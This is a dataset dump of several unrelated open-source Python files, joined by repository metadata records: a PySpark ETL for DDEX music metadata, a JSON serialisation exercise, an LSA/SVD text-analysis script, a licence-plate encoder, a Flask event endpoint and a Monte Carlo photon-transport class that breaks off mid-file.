tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_IndirectSoundRecordingProprietary, self).__init__(\n id_tag=SoundRecordingEnum.IndirectSoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SoundRecordingProprietary(_ResourceOrReleaseProprietary):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingProprietary, self).__init__(\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n spark=spark,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n\nclass _ReleaseProprietary(_ResourceOrReleaseProprietary):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import ReleaseEnum\n\n super(_ReleaseProprietary, self).__init__(\n id_tag=ReleaseEnum.ReleaseId.value,\n has_resource_reference=False,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _Label(_TemplateRawParticipant):\n def __init__(\n self,\n has_resource_reference: bool,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_SOUND_RECORDINGS, MESSAGE_RELEASES\n from ...enums import ReleaseEnum, SoundRecordingEnum\n\n if has_resource_reference:\n details_by_territory_tag = SoundRecordingEnum.SoundRecordingDetailsByTerritory.value\n fields_to_preprocess = [SoundRecordingEnum.ResourceReference.value, f\"{details_by_territory_tag}.*\"]\n valid_source_fields = [SoundRecordingEnum.ResourceReference.value, \"LabelName\"]\n participant_type = \"SoundRecordingLabel\"\n is_main_release = False\n relative_source_path = MESSAGE_SOUND_RECORDINGS\n else:\n details_by_territory_tag = ReleaseEnum.ReleaseDetailsByTerritory.value\n fields_to_preprocess = [f\"{details_by_territory_tag}.*\"]\n valid_source_fields = [\"LabelName\"]\n participant_type = \"ReleaseLabel\"\n is_main_release = True\n relative_source_path = MESSAGE_RELEASES\n\n self.details_by_territory_tag = details_by_territory_tag\n super(_Label, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=fields_to_preprocess,\n valid_source_fields=valid_source_fields,\n participant_type=participant_type,\n is_main_release=is_main_release,\n spark=spark,\n relative_source_path=relative_source_path,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n self._source_df 
= self._source_df \\\n .withColumn(self.details_by_territory_tag, f.explode_outer(f.col(self.details_by_territory_tag))) \\\n .where(f.col(self.details_by_territory_tag).isNotNull())\n\n super(_Label, self)._preprocess()\n\n\nclass _SoundRecordingLabel(_Label):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n super(_SoundRecordingLabel, self).__init__(\n has_resource_reference=True,\n tenant_path=tenant_path,\n input_file=input_file,\n specification_file=specification_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _ReleaseLabel(_Label):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n super(_ReleaseLabel, self).__init__(\n has_resource_reference=False,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _ArtistOrResourceContributor(_TemplateRawParticipant):\n def __init__(\n self,\n artist_or_resource_contributor_tag: str,\n id_tag: str,\n has_resource_reference: bool,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...relative_path import MESSAGE_SOUND_RECORDINGS, MESSAGE_RELEASES\n from ...enums import AttributeEnum, SoundRecordingEnum\n\n role_tag = artist_or_resource_contributor_tag \\\n if artist_or_resource_contributor_tag != \"DisplayArtist\" \\\n else \"Artist\"\n role_tag = f\"{role_tag}Role\"\n if has_resource_reference:\n fields_to_preprocess = [\n SoundRecordingEnum.ResourceReference.value, f\"{artist_or_resource_contributor_tag}.*\", f\"{id_tag}.*\"\n ]\n valid_source_fields = [\n SoundRecordingEnum.ResourceReference.value, \"PartyId\", \"PartyName\",\n \"Nationality\", role_tag, AttributeEnum.SequenceNumber.value,\n \"ProprietaryId\"\n ]\n is_main_release = False\n relative_source_path = MESSAGE_SOUND_RECORDINGS\n else:\n fields_to_preprocess = [f\"{artist_or_resource_contributor_tag}.*\", f\"{id_tag}.*\"]\n valid_source_fields = [\n \"PartyId\", \"PartyName\",\n \"Nationality\", role_tag, AttributeEnum.SequenceNumber.value,\n \"ProprietaryId\"\n ]\n is_main_release = True\n relative_source_path = MESSAGE_RELEASES\n participant_type = f\"{id_tag.replace('Id', '')}{artist_or_resource_contributor_tag}\"\n details_by_territory_tag = id_tag.replace(\"Id\", \"DetailsByTerritory\")\n\n self.artist_or_resource_contributor_tag = artist_or_resource_contributor_tag\n self.id_tag = id_tag\n self.role_tag = role_tag\n self.details_by_territory_tag = details_by_territory_tag\n self.has_resource_reference = has_resource_reference\n super(_ArtistOrResourceContributor, self).__init__(\n tenant_path=tenant_path,\n fields_to_preprocess=fields_to_preprocess,\n valid_source_fields=valid_source_fields,\n participant_type=participant_type,\n is_main_release=is_main_release,\n spark=spark,\n 
relative_source_path=relative_source_path,\n specification_file=specification_file,\n input_file=input_file,\n config=config,\n config_file=config_file\n )\n\n def _preprocess(self) -> tp.NoReturn:\n self._source_df = self._source_df \\\n .withColumn(self.id_tag, f.explode_outer(f.col(self.id_tag))) \\\n .withColumn(self.details_by_territory_tag, f.explode_outer(f.col(self.details_by_territory_tag))) \\\n .where(f.col(self.details_by_territory_tag).isNotNull()) \\\n .withColumn(\n self.artist_or_resource_contributor_tag,\n f.explode_outer(f.col(f\"{self.details_by_territory_tag}.{self.artist_or_resource_contributor_tag}\"))\n ) \\\n .drop(f.col(self.details_by_territory_tag)) \\\n .where(f.col(self.artist_or_resource_contributor_tag).isNotNull())\n\n super(_ArtistOrResourceContributor, self)._preprocess()\n\n\nclass _SoundRecordingIndirectResourceContributor(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingIndirectResourceContributor, self).__init__(\n artist_or_resource_contributor_tag=\"IndirectResourceContributor\",\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SoundRecordingResourceContributor(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingResourceContributor, self).__init__(\n artist_or_resource_contributor_tag=\"ResourceContributor\",\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _SoundRecordingDisplayArtist(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums import SoundRecordingEnum\n\n super(_SoundRecordingDisplayArtist, self).__init__(\n artist_or_resource_contributor_tag=\"DisplayArtist\",\n id_tag=SoundRecordingEnum.SoundRecordingId.value,\n has_resource_reference=True,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass _ReleaseDisplayArtist(_ArtistOrResourceContributor):\n def __init__(\n self,\n tenant_path: str,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n from ...enums 
import ReleaseEnum\n\n super(_ReleaseDisplayArtist, self).__init__(\n artist_or_resource_contributor_tag=\"DisplayArtist\",\n id_tag=ReleaseEnum.ReleaseId.value,\n has_resource_reference=False,\n tenant_path=tenant_path,\n specification_file=specification_file,\n input_file=input_file,\n spark=spark,\n config=config,\n config_file=config_file\n )\n\n\nclass RawParticipant:\n from ...relative_path import PARTICIPANT_RAW\n\n template_raw_participant_classes = [\n _MessageRecipient,\n _MessageSender,\n _SentOnBehalfOf,\n _SentOnBehalfOfProprietary,\n _IndirectSoundRecordingProprietary,\n _SoundRecordingProprietary,\n _ReleaseProprietary,\n _SoundRecordingLabel,\n _ReleaseLabel,\n _SoundRecordingIndirectResourceContributor,\n _SoundRecordingResourceContributor,\n _SoundRecordingDisplayArtist,\n _ReleaseDisplayArtist\n ]\n\n def __init__(\n self,\n tenant_path: str,\n relative_target_path: str = PARTICIPANT_RAW,\n specification_file: tp.Optional[str] = None,\n input_file: tp.Optional[tp.Union[str, tp.List[str]]] = None,\n spark: tp.Optional[SparkSession] = None,\n config: tp.Optional[tp.Dict[str, tp.Any]] = None,\n config_file: tp.Optional[str] = None\n ) -> None:\n self._spark: tp.Optional[SparkSession] = spark\n self._tenant_path: str = tenant_path\n self._relative_target_path: str = relative_target_path\n self._specification_file: tp.Optional[str] = specification_file\n self._input_file: tp.Optional[tp.Union[str, tp.List[str]]] = input_file\n self._config: tp.Optional[tp.Dict[str, tp.Any]] = config\n self._config_file: tp.Optional[str] = config_file\n self._objs: tp.List[_TemplateRawParticipant] = []\n self._target_df: tp.Optional[DataFrame] = None\n\n @property\n def target_df(self) -> tp.Optional[DataFrame]:\n return self._target_df\n\n @target_df.setter\n def target_df(self, df: DataFrame) -> tp.NoReturn:\n if not self._target_df:\n self._target_df = df\n else:\n self._target_df = self._target_df.union(df)\n\n def persist(self) -> tp.NoReturn:\n for cls in self.template_raw_participant_classes:\n obj = cls(tenant_path=self._tenant_path,\n specification_file=self._specification_file,\n input_file=self._input_file,\n spark=self._spark,\n config=self._config,\n config_file=self._config_file)\n\n obj.persist()\n self._objs.append(obj)\n self.target_df = obj.target_df\n\n def unpersist(self) -> tp.NoReturn:\n self._target_df.unpersist()\n for obj in self._objs:\n obj.unpersist()\n\n def write(self) -> tp.NoReturn:\n from dependencies.utils import get_table_path\n from ...enums import CustomFieldEnum\n\n path = get_table_path(self._tenant_path,\n self._relative_target_path,\n partition_name=CustomFieldEnum.SpecificationFileName.value,\n partition_value=self._specification_file)\n\n self.target_df \\\n .where(f.coalesce(f.col(\"LabelName\"),\n f.col(\"FullName\")).isNotNull()) \\\n .repartition(f.col(\"Type\")) \\\n .sortWithinPartitions(f.col(CustomFieldEnum.MessageRange.value)) \\\n .write \\\n .mode(\"overwrite\") \\\n .partitionBy(\"Type\") \\\n .parquet(path)\n","repo_name":"fradriz/vi_sources_etl","sub_path":"jobs/ddex/mappings/participants/raw.py","file_name":"raw.py","file_ext":"py","file_size_in_byte":46371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71871984800","text":"\"\"\"\nExercício - Salve sua classe em JSON\nSalve os dados da sua classe em JSON\ne depois crie novamente as instâncias\nda classe com os dados salvos\nFaça em arquivos separados.\n\"\"\"\nimport json\nclass Carro:\n def __init__(self, nome, cor):\n 
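# Illustrative sketch, not part of the original module: RawParticipant.write()
# above repartitions on the partition column before partitionBy(), so each
# Hive-style "Type=..." directory is written by few tasks, and sorts within
# partitions for better scan locality. A stripped-down version of the same
# write pattern (column names and the path are placeholders):
import pyspark.sql.functions as f

def write_partitioned(df, path: str) -> None:
    (df.where(f.coalesce(f.col("LabelName"), f.col("FullName")).isNotNull())
       .repartition(f.col("Type"))
       .sortWithinPartitions("MessageRange")
       .write
       .mode("overwrite")
       .partitionBy("Type")
       .parquet(path))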
self.nome = nome\n self.cor = cor\n\n def salvar_json(objeto):\n with open('Modulo_3_Introducao_Programacao_Orientada_Objeto\\\\Exercicios\\\\Exercicio_JSON\\\\classe.json', 'w+') as file:\n json.dump(objeto, file, indent=2)\n\ncar = Carro('Ford', 'Vermelho')\ncar2 = Carro('Fiat', 'Preto')\ncar3 = Carro('Kia', 'Azul')\nbd = [vars(car),vars(car2),vars(car3)]\n\nCarro.salvar_json(bd)\n","repo_name":"FreeWillieVitin/Curso_Python","sub_path":"Modulo_3_Introducao_Programacao_Orientada_Objeto/Exercicios/1_Salvar_Classe_em_JSON.py","file_name":"1_Salvar_Classe_em_JSON.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"34665141072","text":"# -*- coding: utf-8 -*-\n\nimport numpy\nimport argparse\nfrom textProcessor import textProcessor\nfrom Stemmer import Stemmer\nimport random\nfrom FileCryptor import FileCryptor\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn.decomposition import PCA\n\nparser = argparse.ArgumentParser(description='File path parser')\nparser.add_argument('--source', '-s', type=str, required=True, help='Путь к файлу или папке с документами')\nparser.add_argument('--dest', '-d', type=str, help='Место сохранения итоговых данных')\nparser.add_argument('--freq', '-f', default=1, type=int, help='Если слово встречактся в документе больше раз, чем'\n ' задано здесь, то оно подлежит удалению')\nparser.add_argument('--pca', action='store_true', help='Если активировать этот ключ, то будет срабатывать'\n 'анализ главных компонент перед отбором признаков')\n\n\ndef plotGraphic(docs, terms, keys, pca=False):\n fig = plt.figure()\n axes = Axes3D(fig)\n\n if(pca == False):\n docs = docs.transpose()\n # x = numpy.arange(-1, 1, 0.1)\n # y = numpy.arange(-1, 1, 0.1)\n # xgrid, ygrid = numpy.meshgrid(x, y)\n # axes.plot_surface(xgrid, ygrid, 0, color='b', alpha='0.33')\n\n i = 1\n for doc in docs:\n axes.scatter(doc[0], doc[1], doc[2], color='b', edgecolor='k')\n axes.plot([doc[0], doc[0]], [doc[1], doc[1]], zs=[doc[2], 0], color='k',\n dashes=[8, 4, 2, 4, 2, 4])\n axes.text(doc[0], doc[1], doc[2], str(i))\n i += 1\n\n j = 0\n for term in terms:\n axes.scatter(term[0], term[1], term[2], color='r', edgecolor='k')\n axes.plot([term[0], term[0]], [term[1], term[1]], zs=[term[2], 0], color='k',\n dashes=[8, 4, 2, 4, 2, 4])\n shift = random.uniform(0.05, 0.1)\n axes.text(term[0], term[1], term[2]+shift, str(keys[j]))\n j += 1\n\n\nargs = parser.parse_args()\n\nwords = []\n\nsource = args.source\ndest = args.dest\nfreq = args.freq\npca = args.pca\n\n# if str(source.find('.txt')) == -1:\nif source[-3:len(source)] != 'txt':\n for k in range(1, 8):\n f = open(source +'/Doc' + str(k) + '.txt',encoding='utf-8')\n # f = open('mydoc\\\\T'+str(i)+'.txt')\n words.append(f.read())\nelse:\n f = open(source,encoding='utf-8')\n # f = open('text2.txt')\n for line in f.readlines():\n words.append(line.strip())\n\nTP = textProcessor()\nST = Stemmer()\n\nwords = [w.lower() for w in words] # Переводим все строки в нижний регистр\nwords = TP.remove_symbols(words) # Удаляем стоп-символы\nwords = TP.remove_stopwords(words) # Удаляем стоп-слова\n# print(words)\n\nstemmed = []\nfor sentence in words:\n s = [ST.stem(i) for i in sentence] # Производится стемминг\n stemmed.append(s)\n# print(stemmed)\n\nkeys = TP.remove_unique(stemmed, freq) # Удаление слов, встречающихся во всех документах более freq раз/\n# print(keys) # По умолчанию частота freq=1 равна еденице\n# print(len(keys)) # 
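# Illustrative sketch, not part of the original exercise file: the
# Portuguese docstring above asks to save the class to JSON *and* then
# recreate the instances from the saved data, but only the save half is
# implemented. Also note salvar_json takes `objeto` with no `self`, so it
# only works as an unbound call like Carro.salvar_json(bd); a @staticmethod
# makes that intent explicit. A minimal round-trip sketch (file path
# shortened for readability; the original's long relative path still applies):
import json

class Carro:
    def __init__(self, nome, cor):
        self.nome = nome
        self.cor = cor

    @staticmethod
    def salvar_json(objetos, caminho='classe.json'):
        with open(caminho, 'w+') as file:
            json.dump(objetos, file, indent=2)

    @classmethod
    def carregar_json(cls, caminho='classe.json'):
        # Recreate one instance per saved dict, completing the exercise.
        with open(caminho) as file:
            return [cls(**dados) for dados in json.load(file)]

Carro.salvar_json([vars(Carro('Ford', 'Vermelho'))])
carros = Carro.carregar_json()
assert carros[0].nome == 'Ford'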
Получаем массив ключевых слов - термов\n\ntable, disp_table = TP.table_generator(keys, stemmed) # Формируем частотную матрицу - table\n# print(disp_table) # И таблицу частоты встречаемости - disp_table\n\n# Сингулярное разложение\nLA = numpy.linalg\nfreqMatrix = numpy.array(table)\n# print(freqMatrix)\nterms, s, docs = LA.svd(freqMatrix, full_matrices=False)\nassert numpy.allclose(freqMatrix, numpy.dot(terms, numpy.dot(numpy.diag(s), docs)))\n# s[2:] = 0\nnew_a = numpy.dot(terms, numpy.dot(numpy.diag(s), docs))\n\n# Вывод графика и Анализ главных компонент, если требуется\nif(pca):\n pca = PCA(n_components=3)\n fit_docs = pca.fit_transform(docs)\n fit_terms = pca.fit_transform(terms)\n print(fit_terms)\n print(' ')\n print(fit_docs)\n print(' ')\n plotGraphic(fit_docs, fit_terms, keys, pca=True)\nelse:\n print(terms)\n print(' ')\n print(s)\n print(' ')\n print(docs)\n print(' ')\n plotGraphic(docs, terms, keys)\n\n\nif(pca):\n termCords = fit_terms # Для разложения с анализом главных компонент\n docCords = fit_docs\nelse:\n termCords = [line[:3] for line in terms] # Для обычного разложения\n docCords = [line[:3] for line in docs.transpose()]\n\n\n# Расчитаем расстояния до всех термов от каждого документа\n # Результаты расчётов поместим в словарь словарей statistics\nstatistics = {} # В нём по номеру документа хранятся словари из пар- (терм: расстояние от терма до данного документа)\nindex = 0 # Получим наглядный словарь по расстояниям от каждого терма до каждого документа\nfor doc in docCords:\n k = 0\n distDictionary = {}\n for term in termCords:\n dist = numpy.sqrt(((float(term[0])-float(doc[0]))**2)+((float(term[1])-float(doc[1]))**2)+((float(term[2])-float(doc[2]))**2))\n distDictionary[keys[k]] = dist\n k += 1\n statistics[index+1] = distDictionary\n index += 1\n\n\n # Теперь отсортируем каждый словарь из statistics по возрастанию расстояния от документа до терма\nl = lambda x: -x[1] # Таким образом получим упорядоченные списки, где первые термы больше всего соответсвуют\nindex = 1 # данному документу.\nwww = []\nwhile index <= statistics.__len__():\n end = sorted(statistics[index].items(), key=l, reverse=True)\n print(index, end[:5]) # Из всех значений термов ��ля каждого документа оставим 5 наиболее длизких по расстоянию\n end_word_list = dict(end[:5]) # И выведем их\n www.append(list(end_word_list.keys()))\n index += 1\n\n\nsss = set() # Теперь составим множество всех термов, которые находятся по отношению к своим документам в\nfor list in www: # пятёрке наиболее близких и выведем их\n for item in list:\n sss.add(item)\nprint(sss) # Это и будут термы, наиболее точно передающие тему и смысл всего набора документов, т.е. текста\n\n# Выводим информацию об анализе в файл\nif dest is not None:\n print(dest)\n plt.savefig(dest+'/graphic', fmt='png')\n with open(dest+r'/results.txt', 'w+', encoding='utf-8') as f:\n k = 0\n j = 0\n f.write('Матрица термы-на-документы\\n')\n for line in disp_table:\n f.write(str(line[::-1])+'\\n')\n\n if(pca):\n f.write('Координаты термов\\n')\n for line in fit_terms:\n f.write(str(line[:3]) + keys[k] + '\\n')\n k += 1\n f.write('Координаты документов\\n')\n for line in fit_docs.transpose(): # Матрица с коорд. документов транспонирована для лучшего вывода\n f.write(str(line[:3]) + 'Doc#' + str(j + 1) + '\\n')\n j += 1\n else:\n f.write('Координаты термов\\n')\n for line in terms:\n f.write(str(line[:3]) + keys[k] + '\\n')\n k += 1\n f.write('Координаты документов\\n')\n for line in docs.transpose(): # Матрица с коорд. 
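# Illustrative sketch, not part of the original LSA.py: the Russian
# comments above describe lowercasing, stop-word removal, stemming,
# dropping terms that occur in documents more than `freq` times, building
# the term-document frequency matrix, and then the SVD. The commented-out
# `s[2:] = 0` line is the key LSA step, a rank-k truncation of the
# singular spectrum. A self-contained numpy check of that truncation:
import numpy as np

A = np.array([[2., 0., 1.],
              [0., 3., 1.],
              [1., 1., 0.],
              [0., 2., 2.]])          # rows = terms, cols = documents
U, s, Vt = np.linalg.svd(A, full_matrices=False)
k = 2
A_k = U[:, :k] @ np.diag(s[:k]) @ Vt[:k, :]   # best rank-k approximation
# Eckart-Young: the Frobenius error equals the norm of the dropped
# singular values.
assert np.isclose(np.linalg.norm(A - A_k), np.linalg.norm(s[k:]))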
документов транспонирована для лучшего вывода\n f.write(str(line[:3])+'Doc#'+str(j+1)+'\\n')\n j += 1\n f.write(str(sss))\n f.close()\n\nplt.show()","repo_name":"Inquient/Diploma---LSA-on-python","sub_path":"LSA.py","file_name":"LSA.py","file_ext":"py","file_size_in_byte":8853,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26160167938","text":"\nclass Plaque:\n \"\"\" Plaque d'immatriculation française\n Représentation numérique et au format AA-001-AA\n \"\"\"\n _iplaque: int = 0\n\n def increment(self, i: int) -> None:\n self._iplaque += i\n \n def _itos(self) -> str:\n i = self._iplaque\n\n n = i % 999\n i //= 999\n d = i % 26\n i //= 26\n c = i % 26\n i //= 26\n b = i % 26\n a = i // 26\n\n aa = chr(a + 65)\n bb = chr(b + 65)\n cc = chr(c + 65)\n dd = chr(d + 65)\n nn = str(n + 1).zfill(3)\n\n return f'{aa}{bb}-{nn}-{cc}{dd}'\n\n def _stoi(self, s: str) -> int:\n a = ord(s[0]) - 65 # int representation of Za-001-aa\n b = ord(s[1]) - 65 # etc.\n c = ord(s[-2]) - 65 # etc.\n d = ord(s[-1]) - 65 # int representation of aa-001-aZ\n n = int(s[3:6]) - 1\n\n return (((a * 26 + b) * 26 + c) * 26 + d) * 999 + n\n\n def __init__(self, s) -> None:\n self._iplaque = self._stoi(s)\n\n def __str__(self) -> str:\n return self._itos()\n\n","repo_name":"niavlys34/Codingame-Solutions","sub_path":"car_license.py","file_name":"car_license.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12191245546","text":"from flask import request\nfrom werkzeug.exceptions import BadRequest\n\nfrom client_action_tracker.app_setup import create_app\n\napp, service = create_app()\n\n\n@app.route('/')\ndef home():\n return service.hello_world()\n\n\n@app.route('/events', methods=['GET', 'POST'])\ndef event():\n data = request.get_json()\n\n api_key = request.headers.get('api-key')\n if not api_key:\n return {'status': 'error', 'description': 'no api key'}, 400\n\n events = data.get('events')\n if not events:\n raise BadRequest(\"Missing 'events' field\")\n\n service.create_events(events, api_key)\n return {'status': 'success'}, 200\n","repo_name":"yujinjcho/client_action_tracker","sub_path":"api/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10842931339","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 28 15:47:12 2021\n\n@author: Luigi Belcastro - Linköping University\nemail: luigi.belcastro@liu.se\n\nClass to represent photon packets\n\"\"\"\nimport numpy as np\nfrom operator import attrgetter # used to find maximum attribute\n\nclass Photon:\n \"\"\"Class to represent photon packets\"\"\"\n def __init__(self, **kwargs):\n self.coordinates = np.array([0,0,0], dtype=float) # in mm. Default to axis origin\n self.direction = np.array([0,0,1], dtype=float) # default to positive z direction\n self.weigth = 1.0 # photon packet weigth\n self.spec = 0 # specular reflection at the surface\n self.dead = False # flag to check photon termination\n self.detected = False # Flag to determine if a photon is detected\n self.step_size = 0 # step size (in mm). 
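# Illustrative usage, not part of the original file: the French docstring
# of the Plaque class above reads "French licence plate; numeric
# representation and the AA-001-AA format". As I read the encoding, it is
# mixed radix: four base-26 letters around a 1..999 counter, with the
# rightmost letter advancing once the number wraps. A quick round-trip check:
p = Plaque('AA-001-AA')
p.increment(1)
assert str(p) == 'AA-002-AA'

p = Plaque('AA-999-AA')
p.increment(1)
assert str(p) == 'AA-001-AB'   # number wraps, last letter advances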
Update at every iteration\n self.scatters = 0 # number of scattering events\n self.path = [] # to store photon path\n self.pathlength = 0 # to store total pathlength\n self.roulette_step = 0 # tracker for pathlength roulette\n self.angles = [] # to store scattering directions\n self.layers = [] # DEBUG to store current layer index\n \n def step(self, tissue):\n \"\"\"\n Generate random step size\n \n Parameters\n ----------\n tissue : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n\n Returns\n -------\n step : FLOAT\n step size in mm\n \"\"\"\n step = -np.log(np.random.rand()) / (tissue.mua + tissue.mus)\n return step\n \n def absorb(self, tissue):\n \"\"\"\n Calculate absorbption and decrease photon weigth\n\n Parameters\n ----------\n tissue : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n\n Returns\n -------\n dw : FLOAT\n absorbed photon weigth\n \"\"\"\n w1 = self.weigth * tissue.mus / (tissue.mua + tissue.mus) # new weigth\n dw = self.weigth - w1 # absorbed weigth\n self.weigth = w1 # update weight\n return dw\n \n def scatter(self, tissue):\n \"\"\"\n Calculate new direction after scattering\n\n Parameters\n ----------\n tissue : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n\n Returns\n -------\n new_dir : FLOAT ARRAY\n new scattering direction\n \"\"\"\n mux, muy, muz = self.direction.copy() # unpack components for convenience\n cos_theta, phi = tissue.phaseFunction.getAngles() # randomly sample scattering angles\n # Save some values to optimize (trigonometric functions are expensive)\n temp = np.sqrt(1-muz**2)\n sin_theta = np.sqrt(1 - cos_theta**2)\n cos_phi = np.cos(phi)\n # sin_phi = np.sin(phi)\n if phi <= np.pi: # new approach, sqrt is less expensive than sin\n sin_phi = np.sqrt(1 - cos_phi**2)\n else:\n sin_phi = -np.sqrt(1 - cos_phi**2)\n\n if np.abs(muz) < 0.99:\n # OLD approach\n new_dir = np.array([\n sin_theta/temp * (mux*muz*cos_phi - muy*sin_phi) + mux*cos_theta, # mux'\n sin_theta/temp * (muy*muz*cos_phi + mux*sin_phi) + muy*cos_theta, # muy'\n -sin_theta*cos_phi*temp + muz*cos_theta # muz'\n ])\n else: # use this to avoid division by zero\n new_dir = np.array([\n sin_theta * cos_phi, # mux\n sin_theta * sin_phi, # muy\n cos_theta * np.sign(muz) # muz\n ])\n \n self.direction = new_dir # update direction \n # return new_dir\n \n def specular(self, tissue1, tissue2):\n \"\"\"\n To be used at the surface, when there is a refracting index mismatch\n\n Parameters\n ----------\n tissue1 : LAYER OBJECT\n An instance of the Layer class representing the outside tissue layer.\n tissue2 : LAYER OBJECT\n An instance of the Layer class representing the incident tissue layer.\n\n Returns\n -------\n None.\n \"\"\"\n Rsp = (tissue1.n - tissue2.n)**2/(tissue1.n + tissue2.n)**2 # specular reflection\n self.weigth -= Rsp # update weigth\n return Rsp # needs to be added to total reflection\n \n def fresnel(self, tissue1, tissue2):\n \"\"\"\n Determine if photon is reflected or refracted at the boundary between two tissues\n and update the direction.\n\n Parameters\n ----------\n tissue1 : LAYER OBJECT\n An instance of the Layer class representing the current tissue layer.\n tissue2 : LAYER OBJECT\n An instance of the Layer class representing the incident tissue layer.\n\n Returns\n -------\n mode : STRING\n Either 'reflect' or 'transmit'\n \"\"\"\n top_layer = max((tissue1, tissue2), key=attrgetter('order')) # find top layer\n ai = top_layer.incident(self)\n # Check 
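# Illustrative sketch, not part of the original MCphoton.py: step() and
# absorb() below implement the standard Monte Carlo transport rules. Path
# lengths are exponentially distributed with mean free path 1/(mua+mus),
# and each interaction deposits the fraction mua/(mua+mus) of the packet
# weight. A tiny numpy check of both, with toy coefficients:
import numpy as np

rng = np.random.default_rng(0)
mua, mus = 0.1, 10.0                    # absorption / scattering, 1/mm
steps = -np.log(rng.random(100_000)) / (mua + mus)
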